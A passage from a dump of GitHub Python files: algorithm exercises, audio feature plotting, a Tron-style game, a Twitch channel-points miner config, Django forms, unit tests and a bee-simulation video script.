print(self.solveEquation('1+x+5+2x-4-3x+5-6=4x+3x+5'))\n print(self.solveEquation('x+5-3+x=6+x-2'))\n print(self.solveEquation('x=x'))\n print(self.solveEquation('2x=x'))\n print(self.solveEquation('x=x+2'))\n\n\nif __name__ == '__main__':\n s = Solution()\n s.test()\n","repo_name":"xjh1230/py_algorithm","sub_path":"test/solve_equation.py","file_name":"solve_equation.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42291489403","text":"from math import sqrt\n\nn=int(input())\ns=int(sqrt(n))\n\ntemp=1\nfor i in range(2,s+1):\n if n%i==0:\n temp=n//i\n break\n\nif temp>=n-1:\n print(n-1)\nelse:\n print(n-temp)\n","repo_name":"Shovon588/Programming","sub_path":"Team Forming Contest/IUPC/TFC 1/I - Frane's Function.py","file_name":"I - Frane's Function.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41539349178","text":"#! /usr/bin/env python\n#-*- coding: utf-8 -*-\n\n\"\"\" 楽曲から抽出した特徴量のプロット \"\"\"\n\nimport sys\nimport numpy as np\nimport librosa\nimport librosa.display\nimport matplotlib.pyplot as plt\nimport matplotlib.style as ms\nms.use('seaborn-muted')\n\n# my module\nsys.path.append('../feature_extraction/')\nimport feature_extraction\n\n# constant value\nSAMPLING_RATE = 44100 # Hz\nWINDOW = 0.2 # sec\nSHIFT = 0.1 # sec\nN_FFT = int(SAMPLING_RATE * WINDOW) # 8820\nHOP_LENGTH = int(SAMPLING_RATE * SHIFT) # 4410\n\n\n##################################################\n# for timbre\n##################################################\n\ndef plot_mfcc(y):\n \"\"\" plot MFCC \"\"\"\n\n # compute MFCC, first delta, second delta\n mfcc, delta1_mfcc, delta2_mfcc = feature_extraction.mfcc(y)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 6))\n # - MFCC\n plt.subplot(311)\n librosa.display.specshow(mfcc)\n plt.ylabel('MFCC')\n plt.colorbar()\n # - first delta\n plt.subplot(312)\n librosa.display.specshow(delta1_mfcc)\n plt.ylabel('MFCC-$\\Delta$')\n plt.colorbar()\n # - second delta\n plt.subplot(313)\n librosa.display.specshow(delta2_mfcc, sr=SAMPLING_RATE, x_axis='time')\n plt.ylabel('MFCC-$\\Delta^2$')\n plt.colorbar()\n\n plt.savefig('../../graph/' + 'mfcc.png', dvi=300)\n plt.tight_layout()\n\n\ndef plot_power(y):\n \"\"\" plot power \"\"\"\n\n # compute log power spectrogram\n S, phase = librosa.magphase(librosa.stft(y,\n n_fft=N_FFT,\n hop_length=HOP_LENGTH))\n log_P = librosa.logamplitude(S**2, ref_power=np.max)\n\n # compute power, first delta\n power, delta1_power = feature_extraction.power(y)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 6))\n # - power\n plt.subplot(311)\n plt.semilogy(power.T, label='RMS Energy')\n plt.xticks([])\n plt.xlim([0, power.shape[-1]])\n plt.legend(loc='best')\n # - first delta\n plt.subplot(312)\n plt.semilogy(delta1_power.T, label='RMS Energy-$\\Delta$')\n plt.xticks([])\n plt.xlim([0, delta1_power.shape[-1]])\n plt.legend(loc='best')\n # - log power spectrogram\n plt.subplot(313)\n librosa.display.specshow(log_P, y_axis='log', x_axis='time')\n plt.title('log Power spectrogram')\n # plt.colorbar()\n\n plt.savefig('../../graph/' + 'power.png', dvi=300)\n plt.tight_layout()\n # なんで曲の途中までしか表示されない?\n # Hzが表示されてる\n\n\n##################################################\n# for harmony\n##################################################\n\ndef plot_chroma(y):\n \"\"\" plot chromagram \"\"\"\n\n # compute chromagram\n C = feature_extraction.chroma(y)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 5))\n # Display the chromagram: the energy in each chromatic pitch class as a function of time\n # To make sure that the colors span the full range of chroma values,\n # set vmin and vmax\n librosa.display.specshow(C,\n sr=SAMPLING_RATE,\n x_axis='time',\n y_axis='chroma',\n vmin=0,\n vmax=1)\n plt.title('Chromagram')\n plt.colorbar()\n\n plt.savefig('../../graph/' + 'chroma.png', dvi=300)\n plt.tight_layout()\n\n\n##################################################\n# for tempo\n##################################################\n\ndef plot_tempogram(y):\n \"\"\" plot tempogram \"\"\"\n\n # compute tempogram\n tempogram = feature_extraction.tempogram(y)\n\n # plot\n plt.clf()\n\n\n##################################################\n# for rhythm\n##################################################\n\ndef plot_mel_spectrogram(y):\n \"\"\" plot Mel spectrogram \"\"\"\n\n # compute Mel spectrogram\n log_S = feature_extraction.mel_spectrogram(y)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 5))\n librosa.display.specshow(log_S, sr=SAMPLING_RATE,\n x_axis='time', y_axis='mel', fmax=8000)\n plt.title('mel power spectrogram')\n plt.colorbar(format='%+02.0f dB')\n\n plt.savefig('../../graph/' + 'mel_spectrogram.png', dvi=300)\n plt.tight_layout()\n\n\ndef plot_mel_spectrogram_harmonic_percussive(y):\n \"\"\" plot harmonic and percussive Mel spectrogram \"\"\"\n\n # compute harmonic and percussive Mel spectrogram\n y_harmonic, y_percussive = librosa.effects.hpss(y)\n log_Sh = feature_extraction.mel_spectrogram(y_harmonic)\n log_Sp = feature_extraction.mel_spectrogram(y_percussive)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 6))\n # - harmonic\n plt.subplot(211)\n librosa.display.specshow(log_Sh, sr=SAMPLING_RATE, y_axis='mel')\n plt.title('mel power spectrogram (Harmonic)')\n plt.colorbar(format='%+02.0f dB')\n # - percussive\n plt.subplot(212)\n librosa.display.specshow(log_Sp, sr=SAMPLING_RATE,\n x_axis='time', y_axis='mel')\n plt.title('mel power spectrogram (Percussive)')\n plt.colorbar(format='%+02.0f dB')\n\n plt.savefig('../../graph/' + 'harmonic_percussive.png', dvi=300)\n plt.tight_layout()\n\n\n##################################################\n# for vocal\n##################################################\n\ndef plot_f0(y):\n \"\"\" plot F0 \"\"\"\n\n # compute F0, first delta\n f0, delta1_f0 = feature_extraction.f0(y)\n\n #️⃣ うまく表示されてない\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 6))\n # - F0\n plt.subplot(211)\n plt.semilogy(f0.T, label='RMS Energy')\n plt.xticks([])\n plt.xlim([0, f0.shape[-1]])\n plt.legend(loc='best')\n # - first delta\n # plt.subplot(211)\n # plt.semilogy(power.T, label='RMS Energy')\n # plt.xticks([])\n # plt.xlim([0, power.shape[-1]])\n # plt.legend(loc='best')\n\n # plt.title('log Power spectrogram')\n plt.savefig('../../graph/' + 'f0.png', dvi=300)\n plt.tight_layout()\n\n\ndef main():\n filepath = '../../wav/1000/100000271.wav'\n y = feature_extraction.read_wav_file(filepath)\n # plot_mfcc(y)\n plot_power(y)\n # plot_mel_spectrogram(y)\n # plot_mel_spectrogram_harmonic_percussive(y)\n\n plot_f0(y)\n # plot_chroma(y)\n # plot_tempogram(y)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hirofumi0810/music_recommendation","sub_path":"src/plot/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":6254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21686428344","text":"import time\nimport os\nimport multiprocessing as mp\n\nfrom compose.cli.main import TopLevelCommand, project_from_options\nfrom urllib import request, parse\n\nfrom tests.common.docker import FTDocker\n\n\ndef get_data_from_graphite_render_api(target, **other_options):\n base_url = \"http://localhost/render\"\n #\"?target=&format=raw&from=-1800s\"\n parms = {\n \"target\": target,\n \"format\": \"raw\",\n \"from\": \"-10s\",\n }\n parms.update(other_options)\n querystring = parse.urlencode(parms)\n u = request.urlopen(base_url+\"?\"+querystring)\n #print(\"[X] URL='{}'\".format(base_url+\"?\"+querystring))\n resp = u.read()\n return resp.decode()\n\n\nclass Graphite(FTDocker):\n \"\"\"This class is an interface to Graphite through docker-compose. It can create\n and manipulate a Graphite system.\n \"\"\"\n \n def __init__(self):\n base = os.path.dirname(__file__)\n super().__init__(os.path.join(base, \"data/graphite\"))\n\n \n\nif __name__ == \"__main__\":\n # some test:\n g = Graphite()\n g.down()\n g.up()\n g.wait_until_running()\n time.sleep(60)\n g.down()\n\n\n","repo_name":"palao/FrUCToSA","sub_path":"tests/functional/graphite.py","file_name":"graphite.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74674645202","text":"class Solution:\n def smallestGoodBase(self, n: str) -> str:\n n = int(n)\n result = n - 1 # each number n has good base n - 1\n\n # n = k^i + k^(i-1) + k^(i-2) + ... + k^2 + k + 1\n for i in range(2, 64): # 10^18 < 2^64\n k = floor(n**(1 / i)) # i-th root of n\n if k == 1:\n break\n\n s = sum(k**j for j in range(i + 1))\n if s == n:\n result = k\n\n return str(result)\n","repo_name":"stbrumme/leetcode","sub_path":"0483.py","file_name":"0483.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38546530494","text":"#!/usr/bin/env python3\n# game.py\n\nfrom wall import Wall\nfrom window import Window\nfrom player import Player\nfrom time import clock\n__author__ = 'Seth Tinglof'\n__version__ = '1.0'\n\n\nclass Game:\n\n SIZE_X = 1280\n SIZE_Y = 720\n\n def __init__(self):\n \"\"\"\n Starts a new Tron game\n :return: self\n \"\"\"\n self.walls = []\n self.characters = []\n self.playing = True\n self.blue_score = 0\n self.red_score = 0\n self.frame = 0\n self.create_characters()\n self.create_initial_walls()\n self.wall_start = [[100, 350], [1180, 350]]\n self.window = Window(self.characters, self.walls)\n self.window.root.after(10, self.intro)\n self.window.root.mainloop()\n\n def create_characters(self):\n \"\"\"\n Creates the players characters\n :return: None\n \"\"\"\n self.characters.append(Player(100, 350, 'blue', 0))\n self.characters.append(Player(1180, 350, 'red', 180))\n\n def create_initial_walls(self):\n \"\"\"\n Creates walls around the border of the map.\n :return: None\n \"\"\"\n self.walls.append(Wall(True, 0, 1280, 0, 'black'))\n self.walls.append(Wall(True, 0, 1280, 707, 'black'))\n self.walls.append(Wall(False, 0, 0, 720, 'black'))\n self.walls.append(Wall(False, 1280, 0, 720, 'black'))\n\n def create_wall(self, player_number):\n \"\"\"\n Creates a new wall that the players cannot cross based on the last position that the player turned and\n the players current position.\n :param player_number: The index of the player who the wall is being created from.\n :return: a new Wall object.\n \"\"\"\n horizontal = self.wall_start[player_number][1] == self.characters[player_number].get_y_pos()\n if horizontal:\n if self.wall_start[player_number][0] < self.characters[player_number].get_x_pos():\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.characters[player_number].get_x_pos(),\n self.characters[player_number].get_y_pos(), self.characters[player_number].get_color())\n else:\n new_wall = Wall(horizontal, self.characters[player_number].get_x_pos(), self.wall_start[player_number][0],\n self.characters[player_number].get_y_pos(), self.characters[player_number].get_color())\n else:\n if self.wall_start[player_number][1] < self.characters[player_number].get_y_pos():\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.wall_start[player_number][1],\n self.characters[player_number].get_y_pos(), self.characters[player_number].get_color())\n else:\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.characters[player_number].get_y_pos(),\n self.wall_start[player_number][1], self.characters[player_number].get_color())\n return new_wall\n\n def add_wall(self, player_num):\n \"\"\"\n Adds a wall to the list of wall that the player has drawn. This wall lasts the duration of the game,\n This method is meant only to be used when the player turns.\n :param player_num: Index of player that is getting the new wall.\n :return: None\n \"\"\"\n wall = self.create_wall(player_num)\n self.walls.append(wall)\n self.characters[player_num].unhittable_walls[1] = wall\n self.wall_start[player_num] = [self.characters[player_num].get_x_pos(), self.characters[player_num].get_y_pos()]\n\n def create_temp_walls(self):\n \"\"\"\n Creates temporary walls that only last for this frame. These are the walls actively created behind the player.\n :return: None\n \"\"\"\n temp_walls = []\n for i in range(len(self.characters)):\n temp_walls.append(self.create_wall(i))\n self.walls.append(temp_walls[i])\n self.characters[i].unhittable_walls[0] = temp_walls[i]\n return temp_walls\n\n def delete_temp_walls(self, temp_walls):\n \"\"\"\n Removes temporary walls at the end of the frame.\n :param temp_walls: wall objects to be removed in a list.\n :return: None\n \"\"\"\n for wall in temp_walls:\n self.walls.remove(wall)\n\n def collisions_check(self):\n \"\"\"\n Checks if either player has hit a wall. If one player has, then the other wins.\n :return: None\n \"\"\"\n for wall in self.walls:\n for i in range(len(self.characters)):\n if wall.check_collision(self.characters[i]) and not wall == self.characters[i].unhittable_walls[0]\\\n and not wall == self.characters[i].unhittable_walls[1]:\n self.playing = False\n if i == 0:\n self.red_score += 1\n else:\n self.blue_score += 1\n self.window.set_score(self.blue_score, self.red_score)\n\n def intro(self):\n self.window.intro()\n self.window.play_button['command'] = self.start_game\n\n def start_game(self):\n \"\"\"\n Begins playing game for the first time.\n :return: None\n \"\"\"\n self.window.intro_frame.pack_forget()\n self.window.center_frame.pack()\n self.window.root.bind(\"\", self.key_pressed)\n self.game_loop()\n\n def game_loop(self):\n \"\"\"\n Main game loop. Runs for the duration of the game.\n :return: None\n \"\"\"\n while True:\n next_time = 0\n while self.playing:\n current_time = clock()\n if current_time >= next_time:\n for character in self.characters:\n character.move()\n temp_walls = self.create_temp_walls()\n self.window.update_canvas()\n self.collisions_check()\n self.delete_temp_walls(temp_walls)\n next_time = current_time + 1 / 60\n self.frame += 1\n self.walls = []\n self.characters = []\n self.window.walls = self.walls\n self.window.characters = self.characters\n self.playing = True\n self.create_characters()\n self.create_initial_walls()\n self.wall_start = [[100, 350], [1180, 350]]\n\n def key_pressed(self, event):\n \"\"\"\n Responds to key pressed events. Allows users to control their characters.\n :param event: Key pressed event.\n :return: None\n \"\"\"\n ######################\n # Player One\n ######################\n if event.char == 'a' and not self.characters[0].get_angle() == 0 \\\n and not self.characters[0].get_angle() == 180 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(180)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n elif event.char == 'w' and not self.characters[0].get_angle() == 270 \\\n and not self.characters[0].get_angle() == 90 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(90)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n elif event.char == 'd' and not self.characters[0].get_angle() == 180 \\\n and not self.characters[0].get_angle() == 0 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(0)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n elif event.char == 's' and not self.characters[0].get_angle() == 90 \\\n and not self.characters[0].get_angle() == 270 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(270)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n ######################\n # Player Two\n ######################\n elif event.keysym == 'Left' and not self.characters[1].get_angle() == 0 \\\n and not self.characters[1].get_angle() == 180 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(180)\n self.add_wall(1)\n self.characters[1].last_turn_frame = self.frame\n elif event.keysym == 'Up' and not self.characters[1].get_angle() == 270 \\\n and not self.characters[1].get_angle() == 90 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(90)\n self.add_wall(1)\n self.characters[1].last_turn_frame = self.frame\n elif event.keysym == 'Right' and not self.characters[1].get_angle() == 180 \\\n and not self.characters[1].get_angle() == 0 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(0)\n self.add_wall(1)\n self.characters[1].last_turn_frame = self.frame\n elif event.keysym == 'Down' and not self.characters[1].get_angle() == 90 \\\n and not self.characters[1].get_angle() == 270 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(270)\n self.add_wall(1)\n print(self.characters[1].last_turn_frame)\n print(self.frame)\n self.characters[1].last_turn_frame = self.frame\n","repo_name":"seth-tinglof/Tron-Like","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12703789262","text":"import logging\n\nlogging.basicConfig(filename='./app.log',\n filemode='w', format='%(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n\nimport pandas as pd\nimport constants\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom tqdm import tqdm\n\n\n\nclass Similarity:\n \"\"\"\n For calculating and saving similarity matrix of users in csv\n \"\"\"\n def __init__(self, file_name):\n self.file_name = file_name\n\n def create_similarity_matrix(self, user, aggregated_df):\n \"\"\"\n Save the similarity matrix in the csv data\n :param user:\n :param aggregated_df:\n :return: void\n \"\"\"\n try:\n user_matrix = pd.DataFrame(user)\n user_matrix.index = aggregated_df['user_handle']\n user_sim_matrix = cosine_similarity(user_matrix)\n\n user_sim_matrix = pd.DataFrame(user_sim_matrix, columns=list(aggregated_df['user_handle']))\n\n user_sim_matrix['user_handle'] = aggregated_df['user_handle']\n\n user_sim_matrix.index = user_sim_matrix.user_handle.values\n\n cols_to_sort = user_sim_matrix.user_handle.tolist()\n\n user_based_top_similarity = []\n\n for val in tqdm(cols_to_sort):\n user_based_top_similarity.append(user_sim_matrix[val].\n sort_values(ascending=False).index.tolist()[1:constants.top_k + 1])\n\n top_columns = ['top_' + str(ind) for ind in range(1, constants.top_k + 1)]\n\n user_sim_matrix.reset_index(inplace=True)\n user_based_top_similarity_df = pd.DataFrame(user_based_top_similarity, columns=top_columns)\n user_based_top_similarity_df['user_handle'] = user_sim_matrix['user_handle']\n user_based_top_similarity_df.to_csv(self.file_name, index=False)\n\n except Exception as e:\n logging.error('Error in create_similarity_matrix', e)\n raise e\n\n\n","repo_name":"karthiktsaliki/recommendations","sub_path":"similarity_calculation.py","file_name":"similarity_calculation.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1946853097","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom TwitchChannelPointsMiner import TwitchChannelPointsMiner\nfrom TwitchChannelPointsMiner.logger import LoggerSettings\nfrom TwitchChannelPointsMiner.classes.entities.Bet import Strategy, BetSettings\nfrom TwitchChannelPointsMiner.classes.entities.Streamer import Streamer, StreamerSettings\nfrom TwitchChannelPointsMiner.classes.TwitchBrowser import Browser, BrowserSettings\n\ntwitch_miner = TwitchChannelPointsMiner(\n username=\"your-twitch-username\",\n claim_drops_startup=False, # If you want to auto claim all drops from Twitch inventory on startup\n logger_settings=LoggerSettings(\n save=True, # If you want to save logs in file (suggested)\n console_level=logging.INFO, # Level of logs - use logging.DEBUG for more info)\n file_level=logging.DEBUG, # Level of logs - If you think the log file it's too big use logging.INFO\n emoji=True, # On Windows we have a problem to print emoji. Set to false if you have a problem\n less=False # If you think that the logs are too much verborse set this to True\n ),\n browser_settings=BrowserSettings(\n browser=Browser.FIREFOX, # Choose if you want to use Chrome or Firefox as browser\n show=False, # Show the browser during bet else headless mode\n do_screenshot=False, # Do screenshot during the bet\n ),\n streamer_settings=StreamerSettings(\n make_predictions=True, # If you want to Bet / Make prediction\n follow_raid=True, # Follow raid to obtain more points\n claim_drops=True, # We can't filter rewards base on stream. Set to False for skip viewing counter increase and you will never obtain a drop reward from this script. Issue #21\n watch_streak=True, # If a streamer go online change the priotiry of streamers array and catch the watch screak. Issue #11\n bet=BetSettings(\n strategy=Strategy.SMART, # Choose you strategy!\n percentage=5, # Place the x% of your channel points\n percentage_gap=20, # Gap difference between outcomesA and outcomesB (for SMART stragegy)\n max_points=50000, # If the x percentage of your channel points is gt bet_max_points set this value\n )\n )\n)\n\n# You can customize the settings for each streamer. If not settings was provided the script will use the streamer_settings from TwitchChannelPointsMiner.\n# If no streamer_settings provided in TwitchChannelPointsMiner the script will use default settings.\n# The streamers array can be a String -> username or Streamer instance.\n\n# The settings priority are: settings in mine function, settings in TwitchChannelPointsMiner instance, default settings.\n# For example if in the mine function you don't provide any value for 'make_prediction' but you have set it on TwitchChannelPointsMiner instance the script will take the value from here.\n# If you haven't set any value even in the instance the default one will be used\n\ntwitch_miner.mine(\n [\n Streamer(\"streamer-username01\", settings=StreamerSettings(make_predictions=True , follow_raid=False , claim_drops=True , watch_streak=True , bet=BetSettings(strategy=Strategy.SMART , percentage=5 , percentage_gap=20 , max_points=234 ) )),\n Streamer(\"streamer-username02\", settings=StreamerSettings(make_predictions=False , follow_raid=True , claim_drops=False , bet=BetSettings(strategy=Strategy.PERCENTAGE , percentage=5 , percentage_gap=20 , max_points=1234 ) )),\n Streamer(\"streamer-username03\", settings=StreamerSettings(make_predictions=True , follow_raid=False , watch_streak=True , bet=BetSettings(strategy=Strategy.SMART , percentage=5 , percentage_gap=30 , max_points=50000 ) )),\n Streamer(\"streamer-username04\", settings=StreamerSettings(make_predictions=False , follow_raid=True , watch_streak=True )),\n Streamer(\"streamer-username05\", settings=StreamerSettings(make_predictions=True , follow_raid=True , claim_drops=True , watch_streak=True , bet=BetSettings(strategy=Strategy.HIGH_ODDS , percentage=7 , percentage_gap=20 , max_points=90 ) )),\n Streamer(\"streamer-username06\"),\n Streamer(\"streamer-username07\"),\n Streamer(\"streamer-username08\"),\n \"streamer-username09\",\n \"streamer-username10\",\n \"streamer-username11\"\n ], # Array of streamers (order = priority)\n followers=False # Automatic download the list of your followers (unable to set custom settings for you followers list)\n)\n","repo_name":"anoviel/Twitch-Channel-Points-Miner-v2","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11819201519","text":"# Задайте число. Составьте список чисел Фибоначчи, в том числе для отрицательных индексов. ДОП\n\n# Пример:\n\n# - для k = 8 список будет выглядеть так: [-21 ,13, -8, 5, −3, 2, −1, 1, 0, 1, 1, 2, 3, 5, 8, 13, 21]\n\ndef nega_fibonacci(n):\n\n if n == 0 or n == 1:\n return n\n elif n == -1:\n return -n\n elif n < 0:\n return int(nega_fibonacci(abs(n)) * (-1)**(n + 1))\n else:\n return nega_fibonacci(n - 1) + nega_fibonacci(n - 2)\n\n\nn = int(input(\"Введите размер последовательности: \"))\nfor i in range(-n, n + 1):\n print(nega_fibonacci(i), end=' ')","repo_name":"ggscream/python_homework_3","sub_path":"Task_5.py","file_name":"Task_5.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12615777773","text":"\"\"\"\nDefines a form to provide validations for course-specific configuration.\n\"\"\"\nfrom django import forms\n\nfrom openedx.core.djangoapps.video_config.forms import CourseSpecificFlagAdminBaseForm\nfrom openedx.core.djangoapps.video_pipeline.models import (\n CourseVideoUploadsEnabledByDefault,\n VEMPipelineIntegration,\n)\n\n\nclass CourseVideoUploadsEnabledByDefaultAdminForm(CourseSpecificFlagAdminBaseForm):\n \"\"\"\n Form for course-specific Video Uploads enabled by default configuration.\n \"\"\"\n\n class Meta:\n model = CourseVideoUploadsEnabledByDefault\n fields = '__all__'\n\n\nclass VEMPipelineIntegrationAdminForm(forms.ModelForm):\n \"\"\"\n Form for VEM Pipeline Integration Admin class.\n \"\"\"\n class Meta:\n model = VEMPipelineIntegration\n fields = '__all__'\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/video_pipeline/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"32885083863","text":"from unittest import TestCase\nfrom amplifier import Amplifier\nfrom thruster import find_max_signal\n\n\nclass TestAmplifier(TestCase):\n def test_wait(self):\n code = [3, 3, 99, 0]\n amplifier = Amplifier(code)\n status, signal = amplifier.execute()\n self.assertEqual(status, 'WAITING')\n self.assertEqual(signal, None)\n status, signal = amplifier.execute(10)\n self.assertEqual(status, 'HALT')\n self.assertEqual(signal, None)\n\n def test_io(self):\n code = [3, 9, 1002, 9, 2, 10, 4, 10, 99, 0, 0]\n amplifier = Amplifier(code)\n status, signal = amplifier.execute(3)\n self.assertEqual(status, 'OUTPUT')\n self.assertEqual(signal, 6)\n status, signal = amplifier.execute()\n self.assertEqual(status, 'HALT')\n self.assertEqual(signal, None)\n\n def test_sample_9(self):\n code = [3, 3, 1107, -1, 8, 3, 4, 3, 99]\n amplifier = Amplifier(code)\n status, signal = amplifier.execute(0)\n self.assertEqual(status, 'OUTPUT')\n self.assertEqual(signal, 1)\n status, signal = amplifier.execute()\n self.assertEqual(status, 'HALT')\n self.assertEqual(signal, None)\n\n def test_sample_11(self):\n code = [3, 12, 6, 12, 15, 1, 13, 14, 13, 4, 13, 99, -1, 0, 1, 9]\n amplifier = Amplifier(code)\n status, signal = amplifier.execute(1)\n self.assertEqual(status, 'OUTPUT')\n self.assertEqual(signal, 1)\n status, signal = amplifier.execute()\n self.assertEqual(status, 'HALT')\n self.assertEqual(signal, None)\n\n\nclass TestFindMaxSignal(TestCase):\n def test_sample_1(self):\n code = '3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0'\n code = [int(n) for n in code.split(',')]\n self.assertEqual(find_max_signal(code), 43210)\n\n def test_sample_2(self):\n code = '3,23,3,24,1002,24,10,24,1002,23,-1,23,' + \\\n '101,5,23,23,1,24,23,23,4,23,99,0,0'\n code = [int(n) for n in code.split(',')]\n self.assertEqual(find_max_signal(code), 54321)\n\n def test_sample_3(self):\n code = '3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,' + \\\n '1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0'\n code = [int(n) for n in code.split(',')]\n self.assertEqual(find_max_signal(code), 65210)\n\n def test_sample_4(self):\n code = '3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,' + \\\n '27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5'\n code = [int(n) for n in code.split(',')]\n self.assertEqual(find_max_signal(code, [5, 6, 7, 8, 9]), 139629729)\n\n def test_sample_5(self):\n code = '3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,' + \\\n '55,26,1001,54,-5,54,1105,1,12,1,53,54,53,1008,54,0,55,' + \\\n '1001,55,1,55,2,53,55,53,4,53,1001,56,-1,56,1005,56,6,' + \\\n '99,0,0,0,0,10'\n code = [int(n) for n in code.split(',')]\n self.assertEqual(find_max_signal(code, [5, 6, 7, 8, 9]), 18216)\n","repo_name":"mdumke/aoc2019","sub_path":"day07/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30027104213","text":"import math\nfrom typing import Type\nimport unittest\nfrom funkcja_kwadratowa import function\n\nclass functionTest(unittest.TestCase):\n def setUp(self):\n self.a = 1\n self.b = 1\n self.c = 1\n self.x_1 = 1\n\n def test_function(self):\n self.assertEqual(function(self.a, self.b, self.c, self.x_1, 1), 3.0)\n self.assertEqual(function(2, 2, 1, 1, 1), 5)\n self.assertEqual(function(-2, -2, -1, 2, 6), -13)\n\n def test_error(self):\n with self.assertRaises(TypeError):\n function(\"1\", 1, 1, 1, 1)\n # with self.assertRaises(ValueError):\n # function(0, 0, 0, 0, 0)\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"RadekKlucz/Jezyki-i-Biblioteki-Analizy-danych-AGH","sub_path":"Lab3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71886198800","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\nimport os\nimport sys\nimport numpy as np\nimport glob2\nimport h5py\nimport matplotlib.pyplot as plt\nimport cv2\nplt.rcParams[\"font.family\"] = \"Arial\"\n\nexperiment_path = \"experiment_1__2019-02-18_11-20-18\"\ntrial_path = \"Q0.15_W0.15_D0.6_T0.02500_wb0.0_decay18.0_seed24\"\nbase_exp_dir = f\"experiments/{experiment_path}/{trial_path}\"\n\n############# Functions\ndef read_config(base_exp_dir):\n cfg_path = glob2.glob(f\"config/files/*.cfg\")[4]\n cfg_path, os.path.exists(cfg_path)\n\n with open(cfg_path, \"r\") as infile:\n lines = [line.split() for line in infile]\n cfg_opts = {}\n for key, val in lines:\n key = key.replace('--', '')\n\n try:\n val = float(val)\n except:\n try:\n val = int(val)\n except:\n if val.startswith(\"T\"):\n val = True\n elif val.startswith(\"F\"):\n val = False\n pass\n cfg_opts[key] = val\n return cfg_opts\n\n\ndef imgs2vid(imgs, outpath, fps=4):\n height, width, layers = imgs[0].shape\n fourcc = cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\")\n video = cv2.VideoWriter(outpath, fourcc, fps, (width, height), True)\n\n for img in imgs:\n video.write(img)\n\n cv2.destroyAllWindows()\n video.release()\n\n############# Run\nscript_config = read_config(base_exp_dir)\nX_MIN = script_config['x_min']\nX_MAX = script_config['x_max']\nDX = script_config['dx']\nGRID_SIZE = np.arange(X_MIN, X_MAX+DX, DX).shape[0]\nconvert_xy_to_index = lambda xy: ((xy - X_MIN) / (X_MAX - X_MIN)) * GRID_SIZE\n\nipynb_dev_config = False\nif not ipynb_dev_config:\n env_path = os.path.join(base_exp_dir, \"envir_hist.h5\")\n bee_path = os.path.join(base_exp_dir, \"bee_hist.h5\")\n print(os.path.exists(env_path), os.path.exists(bee_path), env_path)\nelse:\n base_exp_dir = \"./\"\n env_path = os.path.join(base_exp_dir, \"envir_hist.h5\")\n bee_path = os.path.join(base_exp_dir, \"bee_hist.h5\")\n print(os.path.exists(env_path), os.path.exists(bee_path), env_path)\n\n# Concentration 